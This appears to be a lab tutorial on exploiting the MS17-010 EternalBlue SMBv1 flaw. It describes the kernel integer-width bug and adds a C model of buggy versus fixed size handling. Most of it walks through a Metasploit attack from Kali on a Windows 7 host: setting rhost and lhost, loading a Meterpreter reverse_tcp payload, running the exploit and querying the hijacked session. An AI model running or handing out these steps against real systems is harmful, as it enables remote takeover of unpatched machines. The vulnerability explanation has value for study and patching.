This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by the Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that the overflow is well laid out to overwrite an SMBv1 buffer. The actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool-down period before the shells rain in again.
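The integer-width error in the size calculation, modelled in C as an added example (not the module's or the kernel's code; all names and values are hypothetical): the buggy write-back that stores a DWORD result through a WORD, beside a full-width store that keeps the count within what was actually validated.

```c
#include <stdint.h>
#include <stdio.h>

/* Simplified model of the size bookkeeping described above (hypothetical
 * names; not the kernel's code). The list header carries a DWORD byte
 * count supplied by the client, the converter walks the entries and learns
 * how many bytes are really there, and that corrected value is written
 * back before the conversion loop uses it as its upper bound. */

/* Buggy: the corrected DWORD is stored through a WORD, so only the low 16
 * bits change and the high 16 bits of the client-supplied count survive.
 * (Written as a mask so the partial store is endian-neutral.) */
uint32_t fea_fixup_buggy(uint32_t *size_of_list, uint32_t walked_len)
{
    *size_of_list = (*size_of_list & 0xFFFF0000u) | (walked_len & 0xFFFFu);
    return *size_of_list;
}

/* Hardened: full-width store; the count can never exceed what was walked. */
uint32_t fea_fixup_fixed(uint32_t *size_of_list, uint32_t walked_len)
{
    *size_of_list = walked_len;
    return *size_of_list;
}

/* The conversion loop reads size_of_list bytes from a buffer of buf_len
 * bytes; a bound larger than the buffer is the out-of-bounds condition that
 * feeds the memmove. Returns 1 when the bound is safe, 0 otherwise. */
int fea_bound_is_safe(uint32_t size_of_list, uint32_t buf_len)
{
    return size_of_list <= buf_len;
}

int main(void)
{
    /* Constructed input: client claims 0x10100 bytes, the walk finds only
     * 0xFF00, and the receive buffer really holds 0xFF00 bytes. */
    uint32_t claimed = 0x10100u, walked = 0xFF00u, buf_len = 0xFF00u;

    uint32_t s = claimed;
    printf("buggy : 0x%X -> %s\n", fea_fixup_buggy(&s, walked),
           fea_bound_is_safe(s, buf_len) ? "safe" : "exceeds buffer");
    s = claimed;
    printf("fixed : 0x%X -> %s\n", fea_fixup_fixed(&s, walked),
           fea_bound_is_safe(s, buf_len) ? "safe" : "exceeds buffer");
    return 0;
}
```

The buggy path yields 0x1FF00, larger than both the walked length and the buffer, which is the kind of mismatch a bounds check against the validated length catches.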
Let’s start!!!
Attacker: Kali Linux
Target: Windows 7
Open a terminal in Kali Linux and type msfconsole to load the Metasploit Framework.
msfconsole
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > exploit
As the screenshot shows, we obtained a Meterpreter session once the buffer overflow was exploited by overwriting the SMBv1 buffer.
meterpreter > sysinfo